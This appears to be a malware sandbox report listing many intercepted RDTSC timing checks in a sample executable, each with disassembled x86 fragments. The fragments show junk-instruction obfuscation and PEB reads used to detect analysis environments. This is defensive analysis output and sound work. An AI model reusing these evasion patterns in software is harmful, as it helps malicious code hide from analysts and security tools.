Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 997872 second address: 99789E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98351AAB1Ch 0x00000009 popad 0x0000000a jmp 00007F98351AAB26h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99789E second address: 9978A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99E83D second address: 99E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99E842 second address: 99E85B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9834D75053h 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99E85B second address: 99E864 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99FE37 second address: 99FE44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007F9834D75052h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99FE44 second address: 99FE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 99FE4A second address: 99FE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9834D75052h 0x0000000c push ebx 0x0000000d jmp 00007F9834D7504Bh 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AA125 second address: 9AA12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AA12A second address: 9AA136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F9834D75046h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9A8C22 second address: 9A8C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 jmp 00007F98351AAB1Dh 0x0000000c popad 0x0000000d jmp 00007F98351AAB1Eh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F98351AAB1Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9A8DC1 second address: 9A8DC7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9A90AD second address: 9A90BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F98351AAB16h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9A90BA second address: 9A90C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AED6A second address: 9AED83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AED83 second address: 9AED9E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9834D75046h 0x00000008 js 00007F9834D75046h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jbe 00007F9834D7504Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AED9E second address: 9AEDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F98351AAB1Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9AEAC5 second address: 9AEAE5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F9834D75052h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F9834D75046h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9EAEF8 second address: 9EAEFD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9F9CC7 second address: 9F9CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9F9CCD second address: 9F9CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007F98351AAB16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jc 00007F98351AAB16h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 9F9B50 second address: 9F9B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jg 00007F9834D75048h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC1436 second address: AC1449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F98351AAB1Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC1449 second address: AC1466 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9834D75058h 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07B8 second address: AC07CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jns 00007F98351AAB16h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07CE second address: AC07DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9834D75046h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07DA second address: AC07E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07E0 second address: AC07E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07E9 second address: AC07EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC07EF second address: AC0804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75050h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC0950 second address: AC095A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F98351AAB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC095A second address: AC0964 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9834D75046h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC1001 second address: AC100B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F98351AAB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC100B second address: AC102F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9834D75046h 0x00000008 js 00007F9834D75046h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F9834D7504Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC102F second address: AC1039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F98351AAB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC1186 second address: AC118E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC5677 second address: AC5701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F98351AAB18h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 add dword ptr [ebp+1245D9A4h], eax 0x0000002a cld 0x0000002b push 00000004h 0x0000002d and dl, 00000053h 0x00000030 jmp 00007F98351AAB1Ah 0x00000035 call 00007F98351AAB19h 0x0000003a pushad 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e push eax 0x0000003f pop eax 0x00000040 popad 0x00000041 jmp 00007F98351AAB1Ah 0x00000046 popad 0x00000047 push eax 0x00000048 jmp 00007F98351AAB27h 0x0000004d mov eax, dword ptr [esp+04h] 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F98351AAB22h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC5701 second address: AC5724 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push ecx 0x00000014 pushad 0x00000015 popad 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC5724 second address: AC5728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC5950 second address: AC5993 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F9834D7504Ah 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b jl 00007F9834D75048h 0x00000021 push edi 0x00000022 pop edi 0x00000023 pushad 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 jng 00007F9834D75046h 0x0000002c popad 0x0000002d popad 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F9834D7504Ah 0x00000039 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC72CF second address: AC72EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F98351AAB24h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC72EC second address: AC72F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC72F0 second address: AC7310 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F98351AAB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F98351AAB22h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC7310 second address: AC7316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: AC7316 second address: AC731A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0010 second address: 6DD0016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0016 second address: 6DD001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD001C second address: 6DD0020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0020 second address: 6DD00E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F98351AAB20h 0x00000011 push eax 0x00000012 jmp 00007F98351AAB1Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov edi, esi 0x0000001b pushfd 0x0000001c jmp 00007F98351AAB20h 0x00000021 and al, 00000038h 0x00000024 jmp 00007F98351AAB1Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d jmp 00007F98351AAB26h 0x00000032 mov eax, dword ptr fs:[00000030h] 0x00000038 jmp 00007F98351AAB20h 0x0000003d sub esp, 18h 0x00000040 pushad 0x00000041 mov bx, ax 0x00000044 mov ecx, 3DC51B99h 0x00000049 popad 0x0000004a xchg eax, ebx 0x0000004b pushad 0x0000004c call 00007F98351AAB22h 0x00000051 mov di, cx 0x00000054 pop esi 0x00000055 popad 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F98351AAB1Fh 0x0000005e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD00E6 second address: 6DD00F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 17869D7Ah 0x00000008 mov eax, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD00F9 second address: 6DD0100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0100 second address: 6DD0106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0106 second address: 6DD010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD010A second address: 6DD0120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [eax+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov ecx, 66EAFAE7h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0120 second address: 6DD0125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0125 second address: 6DD0140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9834D75051h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0236 second address: 6DD029A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F98351AAB23h 0x00000014 jmp 00007F98351AAB23h 0x00000019 popfd 0x0000001a call 00007F98351AAB28h 0x0000001f pop ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD029A second address: 6DD02B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 mov eax, 5D646CF9h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007F9834D76051h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop eax 0x00000019 mov edi, 2B8110F0h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD02B9 second address: 6DD02D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB25h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD02D2 second address: 6DD02F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9834D75059h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD02F6 second address: 6DD02FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD02FC second address: 6DD0300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0300 second address: 6DD03BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98351AAB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e pushad 0x0000000f push eax 0x00000010 pushfd 0x00000011 jmp 00007F98351AAB1Bh 0x00000016 add cl, 0000000Eh 0x00000019 jmp 00007F98351AAB29h 0x0000001e popfd 0x0000001f pop eax 0x00000020 mov cx, dx 0x00000023 popad 0x00000024 call dword ptr [77210B60h] 0x0000002a mov eax, 766BE5E0h 0x0000002f ret 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F98351AAB29h 0x00000037 or cx, 73F6h 0x0000003c jmp 00007F98351AAB21h 0x00000041 popfd 0x00000042 mov eax, 174F58E7h 0x00000047 popad 0x00000048 push 00000044h 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d call 00007F98351AAB1Fh 0x00000052 pop esi 0x00000053 call 00007F98351AAB29h 0x00000058 pop esi 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD03BA second address: 6DD041D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e pushfd 0x0000000f jmp 00007F9834D7504Ah 0x00000014 adc al, FFFFFFD8h 0x00000017 jmp 00007F9834D7504Bh 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, edi 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F9834D75054h 0x00000026 jmp 00007F9834D75055h 0x0000002b popfd 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD041D second address: 6DD0421 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0421 second address: 6DD043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D7504Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e movzx esi, bx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD043C second address: 6DD0466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, A661h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b jmp 00007F98351AAB23h 0x00000010 push dword ptr [eax] 0x00000012 pushad 0x00000013 push esi 0x00000014 push edx 0x00000015 pop eax 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 mov bx, si 0x0000001c rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0466 second address: 6DD04BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr fs:[00000030h] 0x0000000d jmp 00007F9834D75052h 0x00000012 push dword ptr [eax+18h] 0x00000015 pushad 0x00000016 mov ecx, 3E9C595Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushfd 0x0000001e jmp 00007F9834D75058h 0x00000023 xor si, 6CE8h 0x00000028 jmp 00007F9834D7504Bh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0520 second address: 6DD0524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0524 second address: 6DD0528 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0528 second address: 6DD052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD052E second address: 6DD0534 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0534 second address: 6DD0557 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98351AAB27h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD0557 second address: 6DD05C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9834D75059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F98A516417Ah 0x0000000f jmp 00007F9834D7504Eh 0x00000014 sub eax, eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F9834D7504Ah 0x0000001d and esi, 5796D3F8h 0x00000023 jmp 00007F9834D7504Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [esi], edi 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F9834D75055h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD05C2 second address: 6DD05D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F98351AAB1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD05D2 second address: 6DD05FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9834D75059h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD05FA second address: 6DD05FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\28PCC9oa8s.exeRDTSC instruction interceptor: First address: 6DD05FE second address: 6DD0604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
